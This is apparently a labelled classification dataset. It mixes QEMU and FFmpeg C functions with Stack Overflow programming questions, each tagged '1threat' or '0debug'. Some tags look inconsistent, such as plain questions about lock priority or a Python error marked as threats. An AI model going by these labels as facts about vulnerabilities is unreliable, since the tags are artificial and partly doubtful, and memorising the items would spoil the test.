cpu_R[dc->dst], tcg_const_tl(simm), 4);
break;
case CRISV10_QIMM_ADDQ:
LOG_DIS("addq %d, $r%d\n", imm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_ADD, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(imm), 4);
break;
case CRISV10_QIMM_ANDQ:
LOG_DIS("andq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_AND, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(simm), 4);
break;
case CRISV10_QIMM_ASHQ:
LOG_DIS("ashq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
op = imm & (1 << 5);
imm &= 0x1f;
if (op) {
cris_alu(dc, CC_OP_ASR, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(imm), 4);
} else {
cris_update_cc_op(dc, CC_OP_FLAGS, 4);
gen_helper_btst(cpu_PR[PR_CCS], cpu_R[dc->dst],
tcg_const_tl(imm), cpu_PR[PR_CCS]);
}
break;
case CRISV10_QIMM_LSHQ:
LOG_DIS("lshq %d, $r%d\n", simm, dc->dst);
op = CC_OP_LSL;
if (imm & (1 << 5)) {
op = CC_OP_LSR;
}
imm &= 0x1f;
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, op, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(imm), 4);
break;
case CRISV10_QIMM_SUBQ:
LOG_DIS("subq %d, $r%d\n", imm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_SUB, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(imm), 4);
break;
case CRISV10_QIMM_ORQ:
LOG_DIS("andq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_OR, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(simm), 4);
break;
case CRISV10_QIMM_BCC_R0:
if (!dc->ir) {
cpu_abort(dc->env, "opcode zero\n");
}
case CRISV10_QIMM_BCC_R1:
case CRISV10_QIMM_BCC_R2:
case CRISV10_QIMM_BCC_R3:
imm = dc->ir & 0xff;
if (imm & 1) {
imm |= 0xffffff00;
imm &= ~1;
}
imm += 2;
LOG_DIS("b%s %d\n", cc_name(dc->cond), imm);
cris_cc_mask(dc, 0);
cris_prepare_cc_branch(dc, imm, dc->cond);
break;
default:
LOG_DIS("pc=%x mode=%x quickimm %d r%d r%d\n",
dc->pc, dc->mode, dc->opcode, dc->src, dc->dst);
cpu_abort(dc->env, "Unhandled quickimm\n");
break;
}
return 2;
}
| 1threat
|
Is it possible to prioritise a lock? : <p>I have a <code>multiprocessing</code> program where</p>
<ul>
<li>one process adds elements to a shared list (<code>multiprocessing.Manager().list()</code>)</li>
<li>several other processes consume these elements from that list (and remove them); they run until there is something to process in the list and the process above is still adding to the list.</li>
</ul>
<p>I implemented locking (via <code>multiprocessing.Lock()</code>) when adding to the list, or removing from it. Since there is one "feeder" process and several (10-40) "consumer" ones all competing for the lock, and that the consumer processes are fast, I end up with the "feeder" process having a hard time acquiring the lock.</p>
<p><strong>Is there a concept of "priority" when acquiring a lock?</strong> I would like the "feeder" process to acquire it with more priority than the others.</p>
<p>Right now I mitigated the issue by having the "consumer" processes wait a random time before trying to acquire the lock while the "feeder" process is there (when it ends it sets a flag). This is a workaround which works but it is ugly and hardly effective (I have the processes wait <code>random.random()*n</code> seconds, where <code>n</code> is the number of processes. This is a completely made up number, probably wrong). </p>
| 0debug
|
def Find_Max(lst):
maxList = max((x) for x in lst)
return maxList
| 0debug
|
Delphi please let me know why my filter not work : test := TFDMemTable.Create(nil);
test.CopyDataSet(TempUnplannedDemand, [coStructure, coRestart, coAppend]);
test.First;
while not test.Eof do
begin
ShowMessage(DateTimeToStr(test.FieldByName('demand_date').AsDateTime) +
' - ' +
IntToStr(test.FieldByName('level').AsInteger));
test.Next;
end;
will show
24/03/2017 - 1
24/03/2017 - 0
24/03/2017 - 1
24/03/2017 - 1
test.IndexFieldNames := 'level';
//test.SetRangeStart;
//test.FieldByName('level').AsInteger := 0;
//test.SetRangeEnd;
//test.FieldByName('level').AsInteger := 0;
//test.ApplyRange;
//test.SetRange([0],[0]);
test.Filter := 'level=0';
test.Filtered := True;
test.First;
while not test.Eof do
begin
ShowMessage(DateTimeToStr(test.FieldByName('demand_date').AsDateTime) +
' - ' +
IntToStr(test.FieldByName('level').AsInteger));
test.Next;
end;
will show
24/03/2017 - 1
24/03/2017 - 0
24/03/2017 - 1
24/03/2017 - 1
why test.Filter := 'level=0'; don't work
Please help me.
| 0debug
|
Python TypeError: 'NoneType' object is not subscriptable only showing on second iteration? : I am getting a really weird error. The function Choose_units() is called in a loop. It works the first time it is called but gives this error the second time. The error is on the line "units_used = UNITS.get(current_units)[0] "
I used some checks before the line and it shows that current_units != None. We were asked to use current_units as a global variable in the assignment.
I used some checks before the line and it shows that current_units != None. But it still displays the same error and for some reason not on the first iteration.
while True:
print_menu();
try:
choice = int(input("What is your choice?: "));
except:
print("Please enter an integer only");
continue;
if choice == 1:
Process_a_new_data_file(current_set);
elif choice == 2:
Choose_units();
def Choose_units():
global current_units
if current_units is not None:
print("a")
print(current_units)
units_used = UNITS.get(current_units)[0]
print("Current units in " + units_used)
print("Choose new units:\n")
for i in UNITS:
print(str(i) + " - " + UNITS[i][0])
while True:
current_units = input("Which unit?\n")
for i in UNITS:
if(int(current_units) == i):
return
print("Please choose a unit from the list")
continue
It should work without showing the error.
My sample run:
Main Menu
---------
1 - Process a new data file
2 - Choose units
3 - Edit room filter
4 - Show summary statistics
5 -Show temperature by date and time
6 -Show histogram of temperatures
7 - Quit
What is your choice?: 2
a
0
Current units in Celsius
Choose new units:
0 - Celsius
1 - Fahrenheit
2 - Kelvin
5 - Rankine
Which unit?
1
Main Menu
---------
1 - Process a new data file
2 - Choose units
3 - Edit room filter
4 - Show summary statistics
5 -Show temperature by date and time
6 -Show histogram of temperatures
7 - Quit
What is your choice?: 2
a
1
Traceback (most recent call last):
File "Assignment9.py", line 274, in <module>
main()
File "Assignment9.py", line 253, in main
Choose_units();
File "Assignment9.py", line 79, in Choose_units
units_used = UNITS.get(current_units)[0]
TypeError: 'NoneType' object is not subscriptable
| 0debug
|
Rxjs One Observable Feeding into Another : <p>I have a rather clunky looking set of code where the data from one observable is feed into another, like such:</p>
<pre><code>let source = this.myService.getFoo()
.subscribe(result => {
let source2 = this.myService.getMoo(result)
.subscribe(result2 => { // do stuff });
});
</code></pre>
<p>I know that there are ways to combine and chain but I need data from source to be feed into source2. The nesting of subscribes looks terrible and I'm pretty certain there is a better way to do this.</p>
<p>Thanks!</p>
| 0debug
|
docker container does not need an OS, but each container has one. Why? : <p>"docker" is a buzz word these days and I'm trying to figure out, what it is and how does it work. And more specifically, how is it different from the normal VM (e.g. VirtualBox, HyperV or WMWare solutions).</p>
<p>The introduction section of the documentation (<a href="https://docs.docker.com/get-started/#a-brief-explanation-of-containers" rel="noreferrer">https://docs.docker.com/get-started/#a-brief-explanation-of-containers</a>) reads:</p>
<blockquote>
<p>Containers run apps natively on the host machine’s kernel. They have better performance characteristics than virtual machines that only get virtual access to host resources through a hypervisor. Containers can get native access, each one running in a discrete process, taking no more memory than any other executable.</p>
</blockquote>
<p>Bingo! Here is the difference. Containers run directly on the kernel of hosting OS, this is why they are so lightweight and fast (plus they provide isolation of processes and nice distribution mechanism in the shape of docker hub, which plays well with the ability to connect containers with each other).</p>
<p>But wait a second. I can run Linux applications on windows using docker - how can it be? Sure, there is some VM. Otherwise we would just not get job done...</p>
<p>OK, but how does it look like, when we work on Linux host??? And here comes real confusion... there one still defines OS as a base image for every image we want to create. Even if we say "FROM scratch" - scratch is still some minimalistic kernel... So here comes</p>
<p><strong>QUESTION 1</strong>: If I run e.g. CentOS host, can I create the container, which would directly use kernel of this host operating system (and not VM, which includes its own OS)? If yes, how can I do it? If no, why the documentaion of docker lies to us (as then docker images always run within some VM and it is not too much different from other VMs, or ist it?)?</p>
<p>After some thinking about it and looking around I was wondering, if some optimization is done for running the images. Here comes</p>
<p><strong>QUESTION 2</strong>: If I run two containers, images of both of which are based on the same parent image, will this parent image be loaded into memory only once? Will there be one VM for each container or just one, which runs both containers? And what if we use different OSs?</p>
<p>The third question is quite beaten:</p>
<p><strong>QUESTION 3</strong>: Are there somewhere some resources, which describe this kind of things... because most of the articles, which discuss docker just tell "it is so cool, you must definitely use ut. Just run one command and be happy"... which does not explain too much.</p>
<p>Thanks.</p>
| 0debug
|
How to register multiple beans using single @Bean-annotated method (or similar) in Spring? : <p>I have a class similar to the following:</p>
<pre><code>@Configuration
public class ApplicationConfiguration {
private <T> T createService(Class<T> serviceInterface) {
// implementation omitted
}
@Bean
public FooService fooService() {
return createService(FooService.class);
}
@Bean
public BarService barService() {
return createService(BarService.class);
}
...
}
</code></pre>
<p>The problem is that there are too many @Bean-annotated methods which differ only in their names, return types and arguments for the <code>crateService</code> method call.
I would like to make this class similar to the following:</p>
<pre><code>@Configuration
public class ApplicationConfiguration {
private static final Class<?>[] SERVICE_INTERFACES = {
FooSerivce.class, BarService.class, ...};
private <T> T createService(Class<T> serviceInterface) {
// implementation omitted
}
@Beans // whatever
public Map<String, Object> serviceBeans() {
Map<String, Object> result = ...
for (Class<?> serviceInterface : SERVICE_INTERFACES) {
result.put(/* calculated bean name */,
createService(serviceInterface));
}
return result;
}
}
</code></pre>
<p>Is it possible in Spring?</p>
| 0debug
|
Java GregorianCalendar check if a day is between other two : <p>Let's say I have two GregorianCalendar dates with the year, the month and the day from the month and they give me another GregorianCalendar date.</p>
<p>Is there a defined method to check if the given date is between the other two dates?</p>
<p>If not, would I need to start comparing the years, then the months and finally the day?</p>
| 0debug
|
JQuery Sliding divs and changeing button : Helo
I have a footer slide toggle funcion, and i want to change on the button. up button, down button.
Please read the codes and you will know, what to want.
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-js -->
$(".footer").click(function () {
$footer = $(this);
//getting the prev element
$content = $footer.prev();
$button = $footer.find("td");
//open up the content needed - toggle the slide- if visible, slide up, if not slidedown.
$content.slideToggle(500, function () {
//execute this after slideToggle is done
//change text of header based on visibility of content div
return $content.is(":visible") ? $button.attr("up","down") : $button.attr("down","up");
});
});
<!-- language: lang-html -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<div class="infobar">
<table class="content">
content
</table>
<table class="footer">
<td class="up" style=" padding-top: 7px; padding-bottom: 7px;" >
</td>
</table>
</div>
<!-- end snippet -->
Demo: http://jsfiddle.net/HAQyK/1652/
How can i slove it?
- List item
| 0debug
|
this code was supposed to get in a loop and when it was invalidit should have been asked for the informations again and again but it doesnt : while True:
for i in text:
print (ord(i))
print (i , "=" , chr (ord(i) +n))
password = (password + chr (ord(i) + n))
if (text.lower() != text):
print ("only lower case.")
elif (n<2 or n>15):
print ("your code must be between 2 and 15, including them.")
return False
else:
print(text , "=>" , password)
| 0debug
|
static void tcg_s390_program_interrupt(CPUS390XState *env, uint32_t code,
int ilen)
{
#ifdef CONFIG_TCG
trigger_pgm_exception(env, code, ilen);
cpu_loop_exit(CPU(s390_env_get_cpu(env)));
#else
g_assert_not_reached();
#endif
}
| 1threat
|
Force singlethreading in form application (.NET 4.5) : I recently created a form application through the Windows Form Application template in Visual Studio. The program was automatically created with multiple threads, putting the UI on one thread and whatever else on the other thread (I think).
Regardless I ran into and fixed the issue described [here][1]
What I want to know is how to do manipulate the program to run everything on a single thread so that I do not have to worry about adding the extra code to manipulate UI objects, or do I not have a choice?
For reference, the code where I ran into this issue was in the main Form class.
[1]: http://stackoverflow.com/a/244614
| 0debug
|
How to assign value inside a Runnable Thread : <p>I have the next code:</p>
<pre><code> for(int i = 0; i < fileRefernces.size(); i++) {
Thread t = new Thread(new Runnable() {
public void run() {
JLabel pageNumber = new JLabel("<html><font color='#003b86'>PAGE" + (i + 1) + "</font></html>", JLabel.LEFT);
JLabel imageLabel = new JLabel(image, JLabel.LEFT);
// content would be probably some Image class or byte[]
// or:
// InputStream in = Loc.openStream();
// read image from in
}
});
}
</code></pre>
<p>But, just at the moment to assign the value, I get the next error:</p>
<blockquote>
<p>error: local variables referenced from an inner class must be final or
effectively final</p>
</blockquote>
<p>How I can assign values to those variables?</p>
| 0debug
|
static int filter_frame(AVFilterLink *inlink, AVFilterBufferRef *insamples)
{
AVFilterContext *ctx = inlink->dst;
AVFilterLink *outlink = ctx->outputs[0];
ShowWavesContext *showwaves = ctx->priv;
const int nb_samples = insamples->audio->nb_samples;
AVFilterBufferRef *outpicref = showwaves->outpicref;
int linesize = outpicref ? outpicref->linesize[0] : 0;
int16_t *p = (int16_t *)insamples->data[0];
int nb_channels = av_get_channel_layout_nb_channels(insamples->audio->channel_layout);
int i, j, h;
const int n = showwaves->n;
const int x = 255 / (nb_channels * n);
for (i = 0; i < nb_samples; i++) {
if (!outpicref) {
showwaves->outpicref = outpicref =
ff_get_video_buffer(outlink, AV_PERM_WRITE|AV_PERM_ALIGN,
outlink->w, outlink->h);
if (!outpicref)
return AVERROR(ENOMEM);
outpicref->video->w = outlink->w;
outpicref->video->h = outlink->h;
outpicref->pts = insamples->pts +
av_rescale_q((p - (int16_t *)insamples->data[0]) / nb_channels,
(AVRational){ 1, inlink->sample_rate },
outlink->time_base);
linesize = outpicref->linesize[0];
memset(outpicref->data[0], 0, showwaves->h*linesize);
}
for (j = 0; j < nb_channels; j++) {
h = showwaves->h/2 - av_rescale(*p++, showwaves->h/2, MAX_INT16);
if (h >= 0 && h < outlink->h)
*(outpicref->data[0] + showwaves->buf_idx + h * linesize) += x;
}
showwaves->sample_count_mod++;
if (showwaves->sample_count_mod == n) {
showwaves->sample_count_mod = 0;
showwaves->buf_idx++;
}
if (showwaves->buf_idx == showwaves->w)
push_frame(outlink);
outpicref = showwaves->outpicref;
}
avfilter_unref_buffer(insamples);
return 0;
}
| 1threat
|
static av_cold int XAVS_init(AVCodecContext *avctx)
{
XavsContext *x4 = avctx->priv_data;
x4->sei_size = 0;
xavs_param_default(&x4->params);
x4->params.pf_log = XAVS_log;
x4->params.p_log_private = avctx;
x4->params.i_keyint_max = avctx->gop_size;
if (avctx->bit_rate) {
x4->params.rc.i_bitrate = avctx->bit_rate / 1000;
x4->params.rc.i_rc_method = XAVS_RC_ABR;
}
x4->params.rc.i_vbv_buffer_size = avctx->rc_buffer_size / 1000;
x4->params.rc.i_vbv_max_bitrate = avctx->rc_max_rate / 1000;
x4->params.rc.b_stat_write = avctx->flags & AV_CODEC_FLAG_PASS1;
if (avctx->flags & AV_CODEC_FLAG_PASS2) {
x4->params.rc.b_stat_read = 1;
} else {
if (x4->crf >= 0) {
x4->params.rc.i_rc_method = XAVS_RC_CRF;
x4->params.rc.f_rf_constant = x4->crf;
} else if (x4->cqp >= 0) {
x4->params.rc.i_rc_method = XAVS_RC_CQP;
x4->params.rc.i_qp_constant = x4->cqp;
}
}
if (x4->aud >= 0)
x4->params.b_aud = x4->aud;
if (x4->mbtree >= 0)
x4->params.rc.b_mb_tree = x4->mbtree;
if (x4->direct_pred >= 0)
x4->params.analyse.i_direct_mv_pred = x4->direct_pred;
if (x4->fast_pskip >= 0)
x4->params.analyse.b_fast_pskip = x4->fast_pskip;
if (x4->motion_est >= 0)
x4->params.analyse.i_me_method = x4->motion_est;
if (x4->mixed_refs >= 0)
x4->params.analyse.b_mixed_references = x4->mixed_refs;
if (x4->b_bias != INT_MIN)
x4->params.i_bframe_bias = x4->b_bias;
if (x4->cplxblur >= 0)
x4->params.rc.f_complexity_blur = x4->cplxblur;
#if FF_API_MOTION_EST
FF_DISABLE_DEPRECATION_WARNINGS
if (x4->motion_est < 0) {
switch (avctx->me_method) {
case ME_EPZS:
x4->params.analyse.i_me_method = XAVS_ME_DIA;
break;
case ME_HEX:
x4->params.analyse.i_me_method = XAVS_ME_HEX;
break;
case ME_UMH:
x4->params.analyse.i_me_method = XAVS_ME_UMH;
break;
case ME_FULL:
x4->params.analyse.i_me_method = XAVS_ME_ESA;
break;
case ME_TESA:
x4->params.analyse.i_me_method = XAVS_ME_TESA;
break;
default:
x4->params.analyse.i_me_method = XAVS_ME_HEX;
}
}
FF_ENABLE_DEPRECATION_WARNINGS
#endif
x4->params.i_bframe = avctx->max_b_frames;
x4->params.b_cabac = 0;
x4->params.i_bframe_adaptive = avctx->b_frame_strategy;
avctx->has_b_frames = !!avctx->max_b_frames;
x4->params.i_keyint_min = avctx->keyint_min;
if (x4->params.i_keyint_min > x4->params.i_keyint_max)
x4->params.i_keyint_min = x4->params.i_keyint_max;
x4->params.i_scenecut_threshold = avctx->scenechange_threshold;
x4->params.rc.i_qp_min = avctx->qmin;
x4->params.rc.i_qp_max = avctx->qmax;
x4->params.rc.i_qp_step = avctx->max_qdiff;
x4->params.rc.f_qcompress = avctx->qcompress;
x4->params.rc.f_qblur = avctx->qblur;
x4->params.i_frame_reference = avctx->refs;
x4->params.i_width = avctx->width;
x4->params.i_height = avctx->height;
x4->params.vui.i_sar_width = avctx->sample_aspect_ratio.num;
x4->params.vui.i_sar_height = avctx->sample_aspect_ratio.den;
x4->params.i_fps_num = avctx->time_base.den;
x4->params.i_fps_den = avctx->time_base.num;
x4->params.analyse.inter = XAVS_ANALYSE_I8x8 |XAVS_ANALYSE_PSUB16x16| XAVS_ANALYSE_BSUB16x16;
x4->params.analyse.i_me_range = avctx->me_range;
x4->params.analyse.i_subpel_refine = avctx->me_subpel_quality;
x4->params.analyse.b_chroma_me = avctx->me_cmp & FF_CMP_CHROMA;
x4->params.analyse.b_transform_8x8 = 1;
x4->params.analyse.i_trellis = avctx->trellis;
x4->params.analyse.i_noise_reduction = avctx->noise_reduction;
if (avctx->level > 0)
x4->params.i_level_idc = avctx->level;
if (avctx->bit_rate > 0)
x4->params.rc.f_rate_tolerance =
(float)avctx->bit_rate_tolerance / avctx->bit_rate;
if ((avctx->rc_buffer_size) &&
(avctx->rc_initial_buffer_occupancy <= avctx->rc_buffer_size)) {
x4->params.rc.f_vbv_buffer_init =
(float)avctx->rc_initial_buffer_occupancy / avctx->rc_buffer_size;
} else
x4->params.rc.f_vbv_buffer_init = 0.9;
x4->params.rc.f_ip_factor = 1 / fabs(avctx->i_quant_factor);
x4->params.rc.f_pb_factor = avctx->b_quant_factor;
x4->params.analyse.i_chroma_qp_offset = avctx->chromaoffset;
x4->params.analyse.b_psnr = avctx->flags & AV_CODEC_FLAG_PSNR;
x4->params.i_log_level = XAVS_LOG_DEBUG;
x4->params.i_threads = avctx->thread_count;
x4->params.b_interlaced = avctx->flags & AV_CODEC_FLAG_INTERLACED_DCT;
if (avctx->flags & AV_CODEC_FLAG_GLOBAL_HEADER)
x4->params.b_repeat_headers = 0;
x4->enc = xavs_encoder_open(&x4->params);
if (!x4->enc)
return -1;
if (!(x4->pts_buffer = av_mallocz((avctx->max_b_frames+1) * sizeof(*x4->pts_buffer))))
return AVERROR(ENOMEM);
if (avctx->flags & AV_CODEC_FLAG_GLOBAL_HEADER) {
xavs_nal_t *nal;
int nnal, s, i, size;
uint8_t *p;
s = xavs_encoder_headers(x4->enc, &nal, &nnal);
avctx->extradata = p = av_malloc(s);
for (i = 0; i < nnal; i++) {
if (nal[i].i_type == NAL_SEI) {
x4->sei = av_malloc( 5 + nal[i].i_payload * 4 / 3 );
if (xavs_nal_encode(x4->sei, &x4->sei_size, 1, nal + i) < 0)
return -1;
continue;
}
size = xavs_nal_encode(p, &s, 1, nal + i);
if (size < 0)
return -1;
p += size;
}
avctx->extradata_size = p - avctx->extradata;
}
return 0;
}
| 1threat
|
How do I display RSS feeds from other web sites : <p>I am trying to display a blog: <a href="http://miletich2.blogspot.co.uk/" rel="nofollow">http://miletich2.blogspot.co.uk/</a> on my clients Wordpress site and as I have been looking around people have been recommending <code>simple pie</code> and their demo works great, but their Wordpress plugin hasn't been updated in 2 years and has loads of bugs.</p>
<p>Does any one know of another plugin that has the same functionality? Any help would be appreciated!</p>
| 0debug
|
uint32_t HELPER(lpdbr)(CPUS390XState *env, uint32_t f1, uint32_t f2)
{
float64 v1;
float64 v2 = env->fregs[f2].d;
v1 = float64_abs(v2);
env->fregs[f1].d = v1;
return set_cc_nz_f64(v1);
}
| 1threat
|
static inline uint32_t vmsvga_fifo_read_raw(struct vmsvga_state_s *s)
{
uint32_t cmd = s->fifo[CMD(stop) >> 2];
s->cmd->stop = cpu_to_le32(CMD(stop) + 4);
if (CMD(stop) >= CMD(max))
s->cmd->stop = s->cmd->min;
return cmd;
}
| 1threat
|
static av_cold int psy_3gpp_init(FFPsyContext *ctx) {
AacPsyContext *pctx;
float bark;
int i, j, g, start;
float prev, minscale, minath, minsnr, pe_min;
int chan_bitrate = ctx->avctx->bit_rate / ((ctx->avctx->flags & CODEC_FLAG_QSCALE) ? 2.0f : ctx->avctx->channels);
const int bandwidth = ctx->avctx->cutoff ? ctx->avctx->cutoff : AAC_CUTOFF(ctx->avctx);
const float num_bark = calc_bark((float)bandwidth);
ctx->model_priv_data = av_mallocz(sizeof(AacPsyContext));
if (!ctx->model_priv_data)
return AVERROR(ENOMEM);
pctx = (AacPsyContext*) ctx->model_priv_data;
pctx->global_quality = (ctx->avctx->global_quality ? ctx->avctx->global_quality : 120) * 0.01f;
if (ctx->avctx->flags & CODEC_FLAG_QSCALE) {
chan_bitrate = (int)(chan_bitrate / 120.0 * (ctx->avctx->global_quality ? ctx->avctx->global_quality : 120));
}
pctx->chan_bitrate = chan_bitrate;
pctx->frame_bits = FFMIN(2560, chan_bitrate * AAC_BLOCK_SIZE_LONG / ctx->avctx->sample_rate);
pctx->pe.min = 8.0f * AAC_BLOCK_SIZE_LONG * bandwidth / (ctx->avctx->sample_rate * 2.0f);
pctx->pe.max = 12.0f * AAC_BLOCK_SIZE_LONG * bandwidth / (ctx->avctx->sample_rate * 2.0f);
ctx->bitres.size = 6144 - pctx->frame_bits;
ctx->bitres.size -= ctx->bitres.size % 8;
pctx->fill_level = ctx->bitres.size;
minath = ath(3410 - 0.733 * ATH_ADD, ATH_ADD);
for (j = 0; j < 2; j++) {
AacPsyCoeffs *coeffs = pctx->psy_coef[j];
const uint8_t *band_sizes = ctx->bands[j];
float line_to_frequency = ctx->avctx->sample_rate / (j ? 256.f : 2048.0f);
float avg_chan_bits = chan_bitrate * (j ? 128.0f : 1024.0f) / ctx->avctx->sample_rate;
float bark_pe = 0.024f * PSY_3GPP_BITS_TO_PE(avg_chan_bits) / num_bark;
float en_spread_low = j ? PSY_3GPP_EN_SPREAD_LOW_S : PSY_3GPP_EN_SPREAD_LOW_L;
float en_spread_hi = (j || (chan_bitrate <= 22.0f)) ? PSY_3GPP_EN_SPREAD_HI_S : PSY_3GPP_EN_SPREAD_HI_L1;
i = 0;
prev = 0.0;
for (g = 0; g < ctx->num_bands[j]; g++) {
i += band_sizes[g];
bark = calc_bark((i-1) * line_to_frequency);
coeffs[g].barks = (bark + prev) / 2.0;
prev = bark;
}
for (g = 0; g < ctx->num_bands[j] - 1; g++) {
AacPsyCoeffs *coeff = &coeffs[g];
float bark_width = coeffs[g+1].barks - coeffs->barks;
coeff->spread_low[0] = pow(10.0, -bark_width * PSY_3GPP_THR_SPREAD_LOW);
coeff->spread_hi [0] = pow(10.0, -bark_width * PSY_3GPP_THR_SPREAD_HI);
coeff->spread_low[1] = pow(10.0, -bark_width * en_spread_low);
coeff->spread_hi [1] = pow(10.0, -bark_width * en_spread_hi);
pe_min = bark_pe * bark_width;
minsnr = exp2(pe_min / band_sizes[g]) - 1.5f;
coeff->min_snr = av_clipf(1.0f / minsnr, PSY_SNR_25DB, PSY_SNR_1DB);
}
start = 0;
for (g = 0; g < ctx->num_bands[j]; g++) {
minscale = ath(start * line_to_frequency, ATH_ADD);
for (i = 1; i < band_sizes[g]; i++)
minscale = FFMIN(minscale, ath((start + i) * line_to_frequency, ATH_ADD));
coeffs[g].ath = minscale - minath;
start += band_sizes[g];
}
}
pctx->ch = av_mallocz_array(ctx->avctx->channels, sizeof(AacPsyChannel));
if (!pctx->ch) {
av_freep(&ctx->model_priv_data);
return AVERROR(ENOMEM);
}
lame_window_init(pctx, ctx->avctx);
return 0;
}
| 1threat
|
UIView Extension to Center View : <p>In my viewcontroller I can center a textField with:</p>
<p><code>textField.center = CGPoint(x: view.bounds.midX, y: textField.center.y)</code></p>
<p>Why doesn't my extension work:</p>
<pre><code>extension UIView {
func centerHorizontally() {
self.center = CGPoint(x: self.superview!.bounds.midX, y: self.center.y)
}
// back in viewcontroller
emailField.centerHorizontally()
</code></pre>
| 0debug
|
Interpreting the sum of TF-IDF scores of words across documents : <p>First let's extract the TF-IDF scores per term per document:</p>
<pre><code>from gensim import corpora, models, similarities
documents = ["Human machine interface for lab abc computer applications",
"A survey of user opinion of computer system response time",
"The EPS user interface management system",
"System and human system engineering testing of EPS",
"Relation of user perceived response time to error measurement",
"The generation of random binary unordered trees",
"The intersection graph of paths in trees",
"Graph minors IV Widths of trees and well quasi ordering",
"Graph minors A survey"]
stoplist = set('for a of the and to in'.split())
texts = [[word for word in document.lower().split() if word not in stoplist] for document in documents]
dictionary = corpora.Dictionary(texts)
corpus = [dictionary.doc2bow(text) for text in texts]
tfidf = models.TfidfModel(corpus)
corpus_tfidf = tfidf[corpus]
</code></pre>
<p>Printing it out:</p>
<pre><code>for doc in corpus_tfidf:
print doc
</code></pre>
<p>[out]:</p>
<pre><code>[(0, 0.4301019571350565), (1, 0.4301019571350565), (2, 0.4301019571350565), (3, 0.4301019571350565), (4, 0.2944198962221451), (5, 0.2944198962221451), (6, 0.2944198962221451)]
[(4, 0.3726494271826947), (7, 0.27219160459794917), (8, 0.3726494271826947), (9, 0.27219160459794917), (10, 0.3726494271826947), (11, 0.5443832091958983), (12, 0.3726494271826947)]
[(6, 0.438482464916089), (7, 0.32027755044706185), (9, 0.32027755044706185), (13, 0.6405551008941237), (14, 0.438482464916089)]
[(5, 0.3449874408519962), (7, 0.5039733231394895), (14, 0.3449874408519962), (15, 0.5039733231394895), (16, 0.5039733231394895)]
[(9, 0.21953536176370683), (10, 0.30055933182961736), (12, 0.30055933182961736), (17, 0.43907072352741366), (18, 0.43907072352741366), (19, 0.43907072352741366), (20, 0.43907072352741366)]
[(21, 0.48507125007266594), (22, 0.48507125007266594), (23, 0.48507125007266594), (24, 0.48507125007266594), (25, 0.24253562503633297)]
[(25, 0.31622776601683794), (26, 0.31622776601683794), (27, 0.6324555320336759), (28, 0.6324555320336759)]
[(25, 0.20466057569885868), (26, 0.20466057569885868), (29, 0.2801947048062438), (30, 0.40932115139771735), (31, 0.40932115139771735), (32, 0.40932115139771735), (33, 0.40932115139771735), (34, 0.40932115139771735)]
[(8, 0.6282580468670046), (26, 0.45889394536615247), (29, 0.6282580468670046)]
</code></pre>
<p>If we want to find the "saliency" or "importance" of the words within this corpus, <strong>can we simple do the sum of the tf-idf scores across all documents and divide it by the number of documents?</strong> I.e. </p>
<pre><code>>>> tfidf_saliency = Counter()
>>> for doc in corpus_tfidf:
... for word, score in doc:
... tfidf_saliency[word] += score / len(corpus_tfidf)
...
>>> tfidf_saliency
Counter({7: 0.12182694202050007, 8: 0.11121194156107769, 26: 0.10886469856464989, 29: 0.10093919463036093, 9: 0.09022272408985754, 14: 0.08705221175200946, 25: 0.08482488519466996, 6: 0.08143359568202602, 10: 0.07480097322359022, 12: 0.07480097322359022, 4: 0.07411881371164887, 13: 0.07117278898823597, 5: 0.07104525967490458, 27: 0.07027283689263066, 28: 0.07027283689263066, 11: 0.060487023243988705, 15: 0.055997035904387725, 16: 0.055997035904387725, 21: 0.05389680556362955, 22: 0.05389680556362955, 23: 0.05389680556362955, 24: 0.05389680556362955, 17: 0.048785635947490406, 18: 0.048785635947490406, 19: 0.048785635947490406, 20: 0.048785635947490406, 0: 0.04778910634833961, 1: 0.04778910634833961, 2: 0.04778910634833961, 3: 0.04778910634833961, 30: 0.045480127933079706, 31: 0.045480127933079706, 32: 0.045480127933079706, 33: 0.045480127933079706, 34: 0.045480127933079706})
</code></pre>
<p>Looking at the output, could we assume that the most "prominent" word in the corpus is:</p>
<pre><code>>>> dictionary[7]
u'system'
>>> dictionary[8]
u'survey'
>>> dictionary[26]
u'graph'
</code></pre>
<p>If so, <strong>what is the mathematical interpretation of the sum of TF-IDF scores of words across documents?</strong></p>
| 0debug
|
When click "clear data", database is deleting. How i solve this : I want to don't delete database of application when click the "clear data" button. How i solve my problem..
I searched but could not find something.
Please help, thanks..
| 0debug
|
SwiftUI: How to remove margin between views in VStack? : <p>Using SwiftUI, I created a VStack, which contains some fixed elements and a list element. The reason is, that the user should only scroll the area under the fixed elements. Now I see a space between the second fixed element and the list. I don't know where this space is coming from and want to get rid of it, but have no idea, how. The area is marked in red.</p>
<pre><code>struct DashboardView : View, CoreDataInjected {
var body: some View {
GeometryReader { geometry in
VStack {
ScopeSelectorView().frame(maxWidth: .infinity).background(ColorPalette.gray)
BalanceNumberView().frame(maxWidth: .infinity)
List {
DashboardNavigationView(
height: geometry.size.height - ScopeSelectorView.height - BalanceNumberView.height
).frame(maxWidth: .infinity).listRowInsets(.zero)
}
}
}.background(Color.red).edgesIgnoringSafeArea(.all)
}
}
</code></pre>
<p><a href="https://i.stack.imgur.com/0wWsp.png" rel="noreferrer"><img src="https://i.stack.imgur.com/0wWsp.png" alt="Screenshot of view"></a></p>
| 0debug
|
char_socket_get_addr(Object *obj, Visitor *v, const char *name,
void *opaque, Error **errp)
{
SocketChardev *s = SOCKET_CHARDEV(obj);
visit_type_SocketAddress(v, name, &s->addr, errp);
